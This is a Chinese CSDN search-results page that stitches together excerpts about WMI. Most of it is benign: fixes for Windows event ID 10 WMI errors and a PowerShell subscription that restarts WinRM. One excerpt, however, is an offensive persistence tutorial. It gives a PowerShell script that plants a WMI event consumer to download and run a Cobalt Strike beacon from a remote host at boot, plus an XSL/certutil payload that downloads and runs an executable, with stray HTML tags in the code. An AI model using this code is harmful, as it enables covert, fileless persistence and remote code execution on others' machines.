精华内容
下载资源
问答
  • 该文件为微软提供的MicrosoftFixit50688.msi文件,可以用来解决事务日志中出现的windows事件ID10,WMI错误
  • 最近笔记本重复了好几次奇怪的现象,重启后进入桌面,然后死机,木有蓝屏。 后来在安全模式里查了事件,如下 日志名称: Application 来源: Microsoft-Windows-WMI ...事件 ID: 10 任务类别: 无 级别:...

    最近笔记本重复了好几次奇怪的现象,重启后进入桌面,然后死机,木有蓝屏。

    后来在安全模式里查了事件,如下 

     

    日志名称:          Application

    来源:            Microsoft-Windows-WMI

    日期:            2017-11-11 22:08:41

    事件 ID:         10

    任务类别:          无

    级别:            错误

    关键字:           经典

    用户:            暂缺

    计算机:           longware-T430

    描述:

    Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

    事件 Xml:

    <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">

      <System>

        <Provider Name="Microsoft-Windows-WMI" Guid="{1edeee53-0afe-4609-b846-d8c0b2075b1f}" EventSourceName="WinMgmt" />

        <EventID Qualifiers="49152">10</EventID>

        <Version>0</Version>

        <Level>2</Level>

        <Task>0</Task>

        <Opcode>0</Opcode>

        <Keywords>0x80000000000000</Keywords>

        <TimeCreated SystemTime="2017-11-11T14:08:41.000000000Z" />

        <EventRecordID>93359</EventRecordID>

        <Correlation />

        <Execution ProcessID="0" ThreadID="0" />

        <Channel>Application</Channel>

        <Computer>longware-T430</Computer>

        <Security />

      </System>

      <EventData>

        <Data>//./root/CIMV2</Data>

        <Data>SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage &gt; 99</Data>

        <Data>0x80041003</Data>

      </EventData>

    </Event>

     

     百思不得其解,于是乎google,发现国内的帖子还木有,国外有几个解决方法,内容如下。

    建立一个 test.vbs 文件,贴入如下内容,保存,然后以管理员模式运行cmd,在cmd里执行test.vbs

     


    strComputer = "."

    Set objWMIService = GetObject("winmgmts:" _

    & "{impersonationLevel=impersonate}!\\" _

    & strComputer & "\root\subscription")

    Set obj1 = objWMIService.ExecQuery("select * from __eventfilter where name='BVTFilter' and query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA ""Win32_Processor"" AND TargetInstance.LoadPercentage > 99'")

    For Each obj1elem in obj1

    set obj2set = obj1elem.Associators_("__FilterToConsumerBinding")

    set obj3set = obj1elem.References_("__FilterToConsumerBinding")

    For each obj2 in obj2set

    WScript.echo "Deleting the object"

    WScript.echo obj2.GetObjectText_

    obj2.Delete_

    next

    For each obj3 in obj3set

    WScript.echo "Deleting the object"

    WScript.echo obj3.GetObjectText_

    obj3.Delete_

    next

    WScript.echo "Deleting the object"

    WScript.echo obj1elem.GetObjectText_

    obj1elem.Delete_

    Next


     目前木有出现死机,是否彻底解决,景观后效。

     

    备忘之。

    转自:https://www.cnblogs.com/longware/p/7823135.html

     

    展开全文
  • Windows7事件ID10,WMI错误的解决方法

    千次阅读 2019-09-18 07:31:03
    事件ID10,WMI错误通过搜索找到解决方法,拷贝以下代码到文本文件里,另存为扩展名为“修复.vbs”,并运行一路确定。代码: strComputer = "." Set objWMIService = GetObject("winmgmts:" & "{...

    近期电脑频繁死机,通过查看日志发现。事件ID10,WMI错误
    Windows7事件ID10,WMI错误的解决方法
    通过搜索找到解决方法,拷贝以下代码到文本文件里,另存为扩展名为“修复.vbs”,并运行一路确定。
    代码:

    strComputer = "."

    Set objWMIService = GetObject("winmgmts:"
    & "{impersonationLevel=impersonate}!\"

    & strComputer & "\root\subscription")

    Set obj1 = objWMIService.ExecQuery("select from __eventfilter where name='BVTFilter' and query='SELECT FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA ""Win32_Processor"" AND TargetInstance.LoadPercentage > 99'")

    For Each obj1elem in obj1

    set obj2set = obj1elem.Associators_("__FilterToConsumerBinding")

    set obj3set = obj1elem.References_("__FilterToConsumerBinding")

    For each obj2 in obj2set

    WScript.echo "Deleting the object"

    WScript.echo obj2.GetObjectText_

    obj2.Delete_

    next

    For each obj3 in obj3set

    WScript.echo "Deleting the object"

    WScript.echo obj3.GetObjectText_

    obj3.Delete_

    next

    WScript.echo "Deleting the object"

    WScript.echo obj1elem.GetObjectText_

    obj1elem.Delete_

    Next

    问题原因:
    这起源于Windows 7 SP1 DVD / ISO创建过程。创建过程中存在导致WMI注册保留在DVD / ISO中的问题。由于注册只能在DVD / ISO创建过程中工作,因此无法在实时系统上运行并导致这些事件。这些事件不表示系统中的任何问题,可以安全地忽略。但是,如果您希望阻止生成这些事件并希望手动删除此特定WMI注册,请按照本文中提到的步骤运行变通方法脚本。
    原文地址https://support.microsoft.com/en-us/help/2545227/event-id-10-is-logged-in-the-application-log-after-you-install-service#FixItForMeAlways

    展开全文
  • 修复事件查看器错误日志wmi id 10错误
  • Powershell+WMI事件订阅

    千次阅读 2018-08-02 10:17:04
    业务场景:添加WMI事件实现对Winrm service的监控,当Winrm 异常停止时,重新启动. BG: 在Powershell 出生之前, WMI是无可替代的远程(本地)系统管理工具。当下Powershell 已经慢慢取代了ActiveScript+WMI, 然而...

     

    业务场景:添加WMI事件实现对Winrm service的监控,当Winrm 异常停止时,重新启动.

    BG: 在Powershell 出生之前, WMI是无可替代的远程(本地)系统管理工具。当下Powershell 已经慢慢取代了ActiveScript+WMI, 然而不可否认WMI依旧是WINDOWS系统管理的利器。

    大家知道DCOM是最初WMI通讯协议,RPC也是饱受黑客眷顾的服务。而随着Winrm的普及已经对SSL/TLS的支持,管理人员更加青睐于基于Winrm通讯协议的远程管理方式。当WINRM成为了最主要的管理方式,甚至取代了RDP。为了防止因为IIS的宕机,相关服务crash而导致WINRM 服务不可用带来的管理工作的不便.  便有了此业务场景

     

    查找Win32_service的元事件

    考虑目标事件应该属于系统事件,并且是由确定实例发出的,可以先用下面的命令查询相应的CimClass

    Get-CimClass -ClassName "__*Event" -PropertyName 'TargetInstance'
    
    
       NameSpace: ROOT/cimv2
    
    CimClassName                        CimClassMethods      CimClassProperties                                                      
    ------------                        ---------------      ------------------                                                      
    __InstanceOperationEvent            {}                   {SECURITY_DESCRIPTOR, TIME_CREATED, TargetInstance}                     
    __InstanceModificationEvent         {}                   {SECURITY_DESCRIPTOR, TIME_CREATED, TargetInstance, PreviousInstance}   
    __InstanceCreationEvent             {}                   {SECURITY_DESCRIPTOR, TIME_CREATED, TargetInstance}                     
    __MethodInvocationEvent             {}                   {SECURITY_DESCRIPTOR, TIME_CREATED, TargetInstance, Method...}          
    __InstanceDeletionEvent             {}                   {SECURITY_DESCRIPTOR, TIME_CREATED, TargetInstance} 

    然后从微软官方文档中可以找出所有系统的wmi class, 查看__InstanceModificationEvent

    https://docs.microsoft.com/en-us/windows/desktop/wmisdk/wmi-system-classes

    通过查看官方文档,确定__InstanceModificationEvent就是我要找的元事件

    创建EventProvider

    $query = "SELECT * FROM __InstanceModificationEvent WITHIN 5 
        WHERE TargetInstance ISA 'Win32_Service' 
            and TargetInstance.Name = 'Winrm' 
            and TargetInstance.State = 'Stopped'"
    $filter = Set-WmiInstance -Class __EventFilter `
     -ComputerName  "localhost" -Namespace "root\subscription" -Arguments `
      @{
        name='WinrmFilter'; 
        EventNameSpace="root\cimv2"; 
        QueryLanguage="WQL";
        Query=$query
       }

     创建EventConsumer

    Consumer 选择 CommandLineEventConsumer,简单易用。 喜欢ActiveScript的同学可以选择ActiveScriptConsumer.

    $Consumer = Set-WmiInstance -Class CommandLineEventConsumer `
     -ComputerName "localhost" -Namespace "root\subscription" `
     -Arguments @{name="WinrmDeamon";
      CommandLineTemplate = { powershell '
            $logPath="C:\setup\WinrmEvent.txt"
            Winrm quickconfig /q >> logPath
            get-date >> logPath
            ' 
       } ;
       ExecutablePath= 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
     }

    这里的CommandLineTemplate. 在某些环境如(winserver 2008 R2, 2012, 2016)中需和ExecutablePath配合使用,如果不指定有效的ExecutablePath, Command不会执行,别问我为什么,不太清楚,我也是试出来的。

    最后将privider 和 consumer绑定。大功告成.

    绑定

    $Binding = Set-WmiInstance -Class __FilterToConsumerBinding -ComputerName 'localhost' `
      -Namespace "root\subscription" -arguments @{Filter=$filter; Consumer=$Consumer} 

     

    测试

    查看WinEvent

    Get-WinEvent -ProviderName 'Microsoft-Windows-WMI-Activity' -MaxEvents 5 | fl
    TimeCreated  : 8/2/2018 2:01:32 AM
    ProviderName : Microsoft-Windows-WMI-Activity
    Id           : 5861
    Message      : Namespace = //./root/subscription; Eventfilter = WinrmFilter (refer to its activate eventid:5859); Consumer = 
                   CommandLineEventConsumer="WinrmDeamon"; PossibleCause = Binding EventFilter: 
                   instance of __EventFilter
                   {
                   	CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 152, 160, 177, 5, 52, 101, 181, 4, 217, 68, 206, 143, 244, 1, 
                   0, 0};
                   	EventNamespace = "root\\cimv2";
                   	Name = "WinrmFilter";
                   	Query = "SELECT * FROM __InstanceModificationEvent WITHIN 5 \n    WHERE TargetInstance ISA 'Win32_Service' \n    
                       and TargetInstance.Name = 'Winrm' \n        and TargetInstance.State = 'Stopped'";
                   	QueryLanguage = "WQL";
                   };
                   Perm. Consumer: 
                   instance of CommandLineEventConsumer
                   {
                   	CommandLineTemplate = " powershell '\n        $logPath=\"C:\\setup\\WinrmEvent.txt\"\n        Winrm quickconfig 
                   /q >> logPath\n        get-date >> logPath\n        ' \n   ";
                   	CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 152, 160, 177, 5, 52, 101, 181, 4, 217, 68, 206, 143, 244, 1, 
                   0, 0};
                   	ExecutablePath = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe";
                   	Name = "WinrmDeamon";
                   };
                   

    如果找到上面的log,说明Wmi持久化Event订阅成功.

    通过命令 stop-service winrm 手动停止winrm 服务, 等待5秒发现Winrm 又恢复启动状态log文件也被创建了。

    OK, 小试牛刀到此结束。

    问题: 当使用域账号创建本地或远程wmi永久事件监听时, 上面的脚本会出错。这是由于Wmi永久事件订阅的执行权限为"LocalSystem". 而域账号在一般情况下会受到限制。

    下一篇主要介绍一种绕过域账号安全限制的一种方式。

    展开全文
  • 权限维持-wmi事件

    2019-06-02 21:32:00
    WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。 在2015年的blackhat大会上Matt Graeber介绍了一种无文件后门就是用的wmi。 ...

     0x01 前言

    WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。

    在2015年的blackhat大会上Matt Graeber介绍了一种无文件后门就是用的wmi。

    https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf

    WMI可以描述为一组管理Windows系统的方法和功能。我们可以把它当作API来与Windows系统进行相互交流。WMI在渗透测试中的价值在于它不需要下载和安装, 因为WMI是Windows系统自带功能。而且整个运行过程都在计算机内存中发生,不会留下任何痕迹。

     

    0x02 wmi常见使用

    检索系统信息

    检索系统已安装的软件

    wmic product list brief |more

     

    搜索系统运行服务

    wmic service list brief |more

     

     

    搜索启动程序

    wmic startup list brief |more

     

    搜索计算机域控制器

    wmic ntdomain list brief

     

    0x03 wmi事件利用达到cs的beacon上线

    如下是 WMI-Persistence.ps1 脚本,代码非常简单,三个函数分别是 插入指定wmi事件,删除指定wmi事件,然后查询wmi事件,需要改的地方就一处,即加粗的远程payload地址,

    当然,事件名也可以改成自己想要的,不过即使不改也没啥太大关系,一眼看不太出来

     

    #
    
    function Install-Persistence{
    
    
    $Payload = "<strong>((new-object net.webclient).downloadstring('http://192.168.3.68:80/logo.gif'))</strong>"
    $EventFilterName = 'Cleanup'
    $EventConsumerName = 'DataCleanup'
    $finalPayload = "<strong>powershell.exe -nop -c `"IEX $Payload`"</strong>"
     
    # Create event filter
    $EventFilterArgs = @{
        EventNamespace = 'root/cimv2'
        Name = $EventFilterName
        Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
        QueryLanguage = 'WQL'
    }
     
    $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs
     
    # Create CommandLineEventConsumer
    $CommandLineConsumerArgs = @{
        Name = $EventConsumerName
        CommandLineTemplate = $finalPayload
    }
    $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs
     
    # Create FilterToConsumerBinding
    $FilterToConsumerArgs = @{
        Filter = $Filter
        Consumer = $Consumer
    }
    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs
     
    #Confirm the Event Filter was created
    $EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
    if ($EventCheck -ne $null) {
        Write-Host "Event Filter $EventFilterName successfully written to host"
    }
     
    #Confirm the Event Consumer was created
    $ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    if ($ConsumerCheck -ne $null) {
        Write-Host "Event Consumer $EventConsumerName successfully written to host"
    }
     
    #Confirm the FiltertoConsumer was created
    $BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'"""
    if ($BindingCheck -ne $null){
        Write-Host "Filter To Consumer Binding successfully written to host"
    }
    }
    
    function Remove-Persistence{ $EventFilterName = 'Cleanup' $EventConsumerName = 'DataCleanup'
    
    
    # Clean up Code - Comment this code out when you are installing persistence otherwise it will
     
    $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
    $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
     
    $FilterConsumerBindingToCleanup | Remove-WmiObject
    $EventConsumerToCleanup | Remove-WmiObject
    $EventFilterToCleanup | Remove-WmiObject
    }
    
    function Check-WMI{ Write-Host "Showing All Root Event Filters"Get-WmiObject -Namespace root/subscription -Class __EventFilter
    
    
    Write-Host "Showing All CommandLine Event Consumers"
    Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer
     
    Write-Host "Showing All Filter to Consumer Bindings"
    Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding
    }

     

    然后开始插入事件,一旦正常插入成功后,当目标再次重启系统,管理员[administrator]正常登录,稍等片刻[2016可能要稍微多等会儿]当系统在后台轮询到我们的payload事件后,便会被触发执行

    PS > Import-Module .\WMI-Persistence.ps1
    
    PS > Install-Persistence
    
    PS > Check-WMI

     

     

    随之,system权限的beacon被正常弹回

    0x04 配合certutil 达到自定义上线

     

    我们还可以使用wmi的远程加载功能

    wmi.xsl 实现的功能很明了,即 certutil下载者

    <?xml version=``'1.0'``?>
    
    <stylesheet
    
    xmlns=``"http://www.w3.org/1999/XSL/Transform" xmlns:ms=``"urn:schemas-microsoft-com:xslt"
    
    xmlns:user=``"placeholder"
    
    version=``"1.0"``>
    
    <output method=``"text"``/>
    
    ``<ms:script implements-prefix=``"user" language=``"JScript"``>
    
    ``<![CDATA[
    
    ``var r = ``new ActiveXObject(``"WScript.Shell"``).Run(``"cmd.exe /c certutil -urlcache -split -f <strong>http://*/load.jpg</strong> %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://*/load.jpg delete"``,0);
    
    ``]]> </ms:script>
    
    </stylesheet>
    
     

     

    修改WMI-Persistence.ps1 脚本,只需把payload部分换下就行,别的不需要动  

     wmic os get /FORMAT:"http://192.168.3.68:80/wmi.xsl"

     

     

    powershell -exec bypass
    
    PS > Import-Module .\WMI-Persistence.ps1
    
    PS > Install-Persistence
    
    PS > Check-WMI
    
    PS > Remove-Persistence 用完以后务必要记得随手删掉

     

     

     

    也可以达到自定义上线的目的。

     

    转载于:https://www.cnblogs.com/-qing-/p/10964486.html

    展开全文
  • 事件触发的执行:WMI事件订阅目的出现场景ATT&CK - T1546.003检查方式 目的 建立持久性 出现场景 比如一些病毒的启动方式、包括但不限于勒索,功能类似计划任务 ATT&CK - T1546.003 攻击者可以通过执行管理...
  • 调用WMIpersist
  • 最近笔记本重复了好几次奇怪的现象,重启后进入桌面,然后死机,木有蓝屏。 后来在安全模式里查了事件,如下 ...事件 ID: 10 任务类别: 无 级别: 错误 关键字: 经典 用户: 暂缺 计算机...
  • WMI 错误 10的解决

    2012-06-29 10:26:57
    WMI 错误 10的解决 http://blog.sina.com.cn/s/blog_53e059e30102e2l8.html
  • WMI技术介绍和应用——事件通知

    千次阅读 2016-02-05 16:09:37
    本文主要讲解如何使用C++编写一个WMI事件查询类
  • c++ wmi使用demo

    2020-09-24 10:38:51
    使用wmi获取设备信息,wmi可用类众多,详细使用可以搜索msdn。这里用获取硬盘序列号等信息作为示例。在vs2008编译运行。
  • WMI事件监控

    2011-12-26 14:43:00
    ExecNotificationQuery和ExecQuery的意义差不多一样,不过前者是专门用来获取WMI事件。$objEventSource.NextEvent() 表示不断进行WQL查询,直到通知产生,这段时间内脚本会暂停。 另外,用$objEventObject.Path_....
  • PowerEvents使创建WMI事件过滤器(定义要捕获的事件)和事件使用者(事件的响应者)变得容易,然后将它们绑定在一起以启动事件流。 通过利用永久事件注册,您可以在工作站或服务器上执行高级监视功能,否则将需要...
  • 在做持久性WMI事件的测试中,反复删除WMI实例,后来遇到如下错误:Event filter with query "select * from DATABASE_MIRRORING_STATE_CHANGE" could not be reactivated in namespace "//./root/subscription" ...
  • 问题描述: Details -Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be ...
  • WMI事件

    2011-11-29 09:41:00
    WMI事件 九、WMI事件所谓WMI事件,即特定对象的属性发生改变时发出的通知,其中包括增加、修改、删除三种类型。首先看到下面一个例子:$strComputer = "."$objWMIService = ObjGet("winmgmts://" &...
  • 微软说这个错误事件不碍事,微软的解决办法就是把ID为10事件禁用http://support.microsoft.com/default.aspx?scid=kb;en-US;2545227 转载于:https://www.cnblogs.com/qiuyi21/articles/2148932.html...
  • 实时监控进程开启demo,使用WMI实时监控进程事件的发生,并做出相应操作
  • 声明:原创文章,谢绝任何形式的转载 0x01 模拟环境 ...0x02 Beacon 上线关于wmi事件是个什么东西,此次不多做说明,还是暂时先侧重在实际利用上,首先,准备好相应的 ps payload,特别注意,此处是直接...
  • wmi事件

    2008-10-28 14:09:00
    Code Set  Events  =   GetObject ( ...winmgmts:\\.\root\cimv2 ...SELECT TargetInstance.Name FROM __InstanceDeletionEvent WITHIN 5...转载于:https://www.cnblogs.com/ahuo/archive/2008/10/28/1321297.html
  • WMI技术介绍和应用——接收事件

    千次阅读 热门讨论 2016-01-19 18:34:09
    时隔两三年,再次更新WMI系列博文。好在功能在三年前就已经实现了,现在只要补充些实例即可。  之前介绍的基本都是查询静态数据,而本文将要介绍非常有意思的事件接收功能。(转载请指明出于breaksoftware的csdn...
  • WMI Delphi代码创建器(WDCC)允许您生成Object Pascal , , C ++和C#代码来访问WMI(Windows管理规范)类,事件和方法。 还包括一组用于浏览和查询WMI内容的工具。 代码生成功能 Wiki页面-有关Delphi和WDCC的...
  • WMITools.exe

    2018-05-30 10:44:20
    WMI(Windows Management Instrumentation)是Windows系统后台运行的一个事件管理器,常用于检查隐匿脚步,修复篡改主页等问题。

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 9,219
精华内容 3,687
关键字:

wmi事件10